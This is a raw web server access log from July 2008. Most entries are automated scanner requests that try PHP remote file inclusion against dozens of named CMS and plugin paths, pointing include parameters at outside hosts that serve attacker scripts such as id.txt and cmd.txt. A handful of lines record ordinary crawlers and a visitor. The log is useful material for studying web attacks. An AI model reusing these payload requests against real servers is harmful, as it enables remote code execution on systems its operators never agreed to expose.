193.111.11.7 - - [15/Jul/2008:00:49:00 -0500] "GET /logs//admin.php?include_path=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.111.11.7 - - [15/Jul/2008:00:49:01 -0500] "GET //admin.php?include_path=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.221.130.6 - - [15/Jul/2008:00:49:43 -0500] "GET /logs/access_log.1207785600//modules/TotalCalendar/about.php?inc_dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
77.221.130.6 - - [15/Jul/2008:00:49:44 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
77.221.130.6 - - [15/Jul/2008:00:49:44 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
207.44.230.33 - - [15/Jul/2008:00:51:35 -0500] "GET /logs/access_log.1207785600//modules/TotalCalendar/about.php?inc_dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
207.44.230.33 - - [15/Jul/2008:00:51:35 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
207.44.230.33 - - [15/Jul/2008:00:51:35 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
163.17.209.5 - - [15/Jul/2008:00:52:43 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.uitvaartverzekerenonline.nl/images/auto.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
163.17.209.5 - - [15/Jul/2008:00:52:43 -0500] "GET //appserv/main.php?appserv_root=http://www.uitvaartverzekerenonline.nl/images/auto.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
163.17.209.5 - - [15/Jul/2008:00:52:44 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.uitvaartverzekerenonline.nl/images/auto.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
83.172.132.29 - - [15/Jul/2008:00:52:45 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
83.172.132.29 - - [15/Jul/2008:00:52:45 -0500] "GET //skin/zero_vote/error.php?dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
83.172.132.29 - - [15/Jul/2008:00:52:45 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
193.91.99.14 - - [15/Jul/2008:00:54:03 -0500] "GET /logs/access_log.1207785600//modules/TotalCalendar/about.php?inc_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
193.91.99.14 - - [15/Jul/2008:00:54:04 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
193.91.99.14 - - [15/Jul/2008:00:54:05 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.221.130.6 - - [15/Jul/2008:00:54:54 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
77.221.130.6 - - [15/Jul/2008:00:54:54 -0500] "GET //skin/zero_vote/error.php?dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
77.221.130.6 - - [15/Jul/2008:00:54:54 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
207.44.230.33 - - [15/Jul/2008:00:55:52 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
207.44.230.33 - - [15/Jul/2008:00:55:52 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
207.44.230.33 - - [15/Jul/2008:00:57:27 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
207.44.230.33 - - [15/Jul/2008:00:57:27 -0500] "GET //skin/zero_vote/error.php?dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
207.44.230.33 - - [15/Jul/2008:00:57:28 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
201.116.50.181 - - [15/Jul/2008:00:58:21 -0500] "GET /logs/access_log.1207785600/modules/My_eGallery/index.php?basepath=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 340 "-""libwww-perl/5.803"
201.116.50.181 - - [15/Jul/2008:00:58:21 -0500] "GET /modules/My_eGallery/index.php?basepath=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
201.116.50.181 - - [15/Jul/2008:00:58:21 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
77.221.130.6 - - [15/Jul/2008:01:01:06 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
77.221.130.6 - - [15/Jul/2008:01:01:07 -0500] "GET //include/admin.lib.inc.php?site_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
195.70.36.107 - - [15/Jul/2008:01:02:37 -0500] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
195.70.36.107 - - [15/Jul/2008:01:02:38 -0500] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
208.80.193.50 - - [15/Jul/2008:01:03:08 -0500] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php? HTTP/1.0" 404 348 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50728)"
217.13.86.112 - - [15/Jul/2008:01:06:02 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
217.13.86.112 - - [15/Jul/2008:01:06:02 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
217.13.86.112 - - [15/Jul/2008:01:12:46 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
217.13.86.112 - - [15/Jul/2008:01:12:46 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
62.141.56.49 - - [15/Jul/2008:01:12:54 -0500] "GET /logs/access_log.1183507200//ws/get_events.php?includedir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.65"
62.141.56.49 - - [15/Jul/2008:01:12:54 -0500] "GET //ws/get_events.php?includedir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
62.141.56.49 - - [15/Jul/2008:01:12:54 -0500] "GET /logs//ws/get_events.php?includedir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
83.172.132.29 - - [15/Jul/2008:01:13:25 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
83.172.132.29 - - [15/Jul/2008:01:13:25 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
207.44.230.33 - - [15/Jul/2008:01:16:49 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
207.44.230.33 - - [15/Jul/2008:01:16:50 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
216.40.230.5 - - [15/Jul/2008:01:26:15 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.suttas.com/files/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
216.40.230.5 - - [15/Jul/2008:01:26:15 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.suttas.com/files/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
75.125.40.130 - - [15/Jul/2008:01:30:09 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
75.125.40.130 - - [15/Jul/2008:01:30:09 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
217.13.86.112 - - [15/Jul/2008:01:31:04 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
217.13.86.112 - - [15/Jul/2008:01:31:04 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
216.206.238.35 - - [15/Jul/2008:01:31:43 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
216.206.238.35 - - [15/Jul/2008:01:31:43 -0500] "GET //skin/zero_vote/error.php?dir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
81.3.2.99 - - [15/Jul/2008:01:33:06 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.sfaguild.net/Calendar//includes/did.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
81.3.2.99 - - [15/Jul/2008:01:33:08 -0500] "GET //skin/zero_vote/error.php?dir=http://www.sfaguild.net/Calendar//includes/did.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
207.44.230.33 - - [15/Jul/2008:01:33:53 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
207.44.230.33 - - [15/Jul/2008:01:33:53 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
72.47.205.18 - - [15/Jul/2008:01:35:14 -0500] "GET /logs/login.php?dir=http://www.iglesialcs.cl/newweb/images/arab.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
72.47.205.18 - - [15/Jul/2008:01:35:14 -0500] "GET /login.php?dir=http://www.iglesialcs.cl/newweb/images/arab.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
74.6.18.252 - - [15/Jul/2008:01:35:15 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.252 - - [15/Jul/2008:01:35:16 -0500] "GET /logs/access_log.1158451200 HTTP/1.0" 200 255501 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
201.10.50.25 - - [15/Jul/2008:01:36:00 -0500] "GET /logs/access_log.1183507200/ws/get_events.php?includedir=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
201.10.50.25 - - [15/Jul/2008:01:36:01 -0500] "GET /ws/get_events.php?includedir=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
201.10.50.25 - - [15/Jul/2008:01:36:03 -0500] "GET /logs/ws/get_events.php?includedir=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
212.160.134.131 - - [15/Jul/2008:01:36:30 -0500] "GET /logs/login.php?dir=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
212.160.134.131 - - [15/Jul/2008:01:36:31 -0500] "GET /login.php?dir=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
211.20.85.150 - - [15/Jul/2008:01:42:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
87.242.99.137 - - [15/Jul/2008:01:50:25 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
87.242.99.137 - - [15/Jul/2008:01:50:25 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
87.242.99.137 - - [15/Jul/2008:01:50:26 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
87.242.99.137 - - [15/Jul/2008:01:50:26 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
213.133.102.211 - - [15/Jul/2008:01:50:35 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.806"
213.133.102.211 - - [15/Jul/2008:01:50:35 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.806"
91.186.1.118 - - [15/Jul/2008:01:56:47 -0500] "GET /logs/cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://www.dhammajak.net/guestbook/id.txt? HTTP/1.1" 404 353 "-""libwww-perl/5.810"
91.186.1.118 - - [15/Jul/2008:01:56:47 -0500] "GET /cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://www.dhammajak.net/guestbook/id.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
217.196.64.12 - - [15/Jul/2008:02:02:01 -0500] "GET /logs//bits_listings.php?svr_rootPhpStart=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
217.196.64.12 - - [15/Jul/2008:02:02:01 -0500] "GET //bits_listings.php?svr_rootPhpStart=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
216.206.238.35 - - [15/Jul/2008:02:03:17 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
216.206.238.35 - - [15/Jul/2008:02:03:17 -0500] "GET //skin/zero_vote/error.php?dir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
216.206.238.35 - - [15/Jul/2008:02:03:18 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
38.99.44.104 - - [15/Jul/2008:02:05:01 -0500] "GET /icons/blank.gif HTTP/1.0" 200 148 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
217.110.54.240 - - [15/Jul/2008:02:06:17 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
217.110.54.240 - - [15/Jul/2008:02:06:17 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
87.106.45.29 - - [15/Jul/2008:02:06:40 -0500] "GET /logs//?p=http://www.wattspot.us/id.txt? HTTP/1.1" 200 91388 "-""libwww-perl/5.803"
87.106.45.29 - - [15/Jul/2008:02:06:40 -0500] "GET //?p=http://www.wattspot.us/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
82.165.39.186 - - [15/Jul/2008:02:06:42 -0500] "GET /logs//?p=http://www.trosken.com/id.txt? HTTP/1.1" 200 91388 "-""libwww-perl/5.76"
82.165.39.186 - - [15/Jul/2008:02:06:42 -0500] "GET //?p=http://www.trosken.com/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.76"
87.101.4.49 - - [15/Jul/2008:02:11:42 -0500] "GET /logs/administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.ritewaycharityservices.com/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
87.101.4.49 - - [15/Jul/2008:02:11:43 -0500] "GET /administrator/components/com_joomla-visites/core/include/errors.php?error=http://www.ritewaycharityservices.com/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
81.3.2.99 - - [15/Jul/2008:02:14:16 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.sfaguild.net/Calendar//includes/did.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
81.3.2.99 - - [15/Jul/2008:02:14:17 -0500] "GET //skin/zero_vote/error.php?dir=http://www.sfaguild.net/Calendar//includes/did.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
205.234.197.170 - - [15/Jul/2008:02:17:06 -0500] "GET /logs//send_reminders.php?includedir=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.813"
205.234.197.170 - - [15/Jul/2008:02:17:06 -0500] "GET //send_reminders.php?includedir=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 303 "-""libwww-perl/5.813"
64.185.237.77 - - [15/Jul/2008:02:17:51 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://multimusiq.co.uk/id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
64.185.237.77 - - [15/Jul/2008:02:17:56 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://multimusiq.co.uk/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
222.73.48.200 - - [15/Jul/2008:02:18:45 -0500] "GET /logs//include.php?path[docroot]=http://lizartdisplay.com/di?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
222.73.48.200 - - [15/Jul/2008:02:18:46 -0500] "GET //include.php?path[docroot]=http://lizartdisplay.com/di?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
74.6.18.252 - - [15/Jul/2008:02:19:41 -0500] "GET /logs/access_log.1207872000 HTTP/1.0" 200 267231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.47.205.18 - - [15/Jul/2008:02:22:52 -0500] "GET /logs//send_reminders.php?includedir=http://geocities.com/lase_keren/cmd.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
72.47.205.18 - - [15/Jul/2008:02:22:52 -0500] "GET //send_reminders.php?includedir=http://geocities.com/lase_keren/cmd.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
74.6.18.252 - - [15/Jul/2008:02:25:46 -0500] "GET /logs/access_log.1207094400 HTTP/1.0" 200 228905 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
75.125.40.130 - - [15/Jul/2008:02:27:35 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
75.125.40.130 - - [15/Jul/2008:02:27:35 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
217.13.86.112 - - [15/Jul/2008:02:28:28 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
217.13.86.112 - - [15/Jul/2008:02:28:29 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
207.44.230.33 - - [15/Jul/2008:02:29:38 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
207.44.230.33 - - [15/Jul/2008:02:29:38 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
216.246.29.107 - - [15/Jul/2008:02:30:45 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
216.246.29.107 - - [15/Jul/2008:02:30:45 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
216.246.29.107 - - [15/Jul/2008:02:30:48 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
216.246.29.107 - - [15/Jul/2008:02:30:48 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
217.13.86.112 - - [15/Jul/2008:02:31:42 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.13.86.112 - - [15/Jul/2008:02:31:42 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://avast4ever.xpg.com.br/TT??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Jul/2008:02:40:43 -0500] "GET /logs//poll/admin/common.inc.php?base_path=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Jul/2008:02:40:43 -0500] "GET //poll/admin/common.inc.php?base_path=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
77.221.130.5 - - [15/Jul/2008:02:41:12 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
77.221.130.5 - - [15/Jul/2008:02:41:13 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
77.221.130.5 - - [15/Jul/2008:02:41:16 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
77.221.130.5 - - [15/Jul/2008:02:41:16 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
87.242.99.137 - - [15/Jul/2008:02:44:20 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
87.242.99.137 - - [15/Jul/2008:02:44:21 -0500] "GET //ashnews.php?pathtoashnews=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
77.221.130.5 - - [15/Jul/2008:02:44:22 -0500] "GET /logs//?page=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 200 91388 "-""libwww-perl/5.803"
77.221.130.5 - - [15/Jul/2008:02:44:22 -0500] "GET /logs//?page=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 200 91388 "-""libwww-perl/5.803"
77.221.130.5 - - [15/Jul/2008:02:44:22 -0500] "GET //?page=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
77.221.130.5 - - [15/Jul/2008:02:44:22 -0500] "GET //?page=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
87.242.99.137 - - [15/Jul/2008:02:44:47 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
87.242.99.137 - - [15/Jul/2008:02:44:47 -0500] "GET //ashnews.php?pathtoashnews=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
217.110.54.240 - - [15/Jul/2008:02:45:55 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
217.110.54.240 - - [15/Jul/2008:02:45:55 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
87.242.99.137 - - [15/Jul/2008:02:46:29 -0500] "GET /logs//atom.php5?page=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
87.242.99.137 - - [15/Jul/2008:02:46:29 -0500] "GET //atom.php5?page=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.242.99.137 - - [15/Jul/2008:02:46:40 -0500] "GET /logs//atom.php5?page=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
87.242.99.137 - - [15/Jul/2008:02:46:40 -0500] "GET //atom.php5?page=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.17.194.46 - - [15/Jul/2008:02:50:48 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?client=opera&rls=it&q=vintage+tattoo&sourceid=opera&ie=utf-8&oe=utf-8""Opera/9.24 (Macintosh; Intel Mac OS X; U; it)"
87.17.194.46 - - [15/Jul/2008:02:50:48 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.24 (Macintosh; Intel Mac OS X; U; it)"
87.17.194.46 - - [15/Jul/2008:02:50:48 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.24 (Macintosh; Intel Mac OS X; U; it)"
87.17.194.46 - - [15/Jul/2008:02:50:49 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.24 (Macintosh; Intel Mac OS X; U; it)"
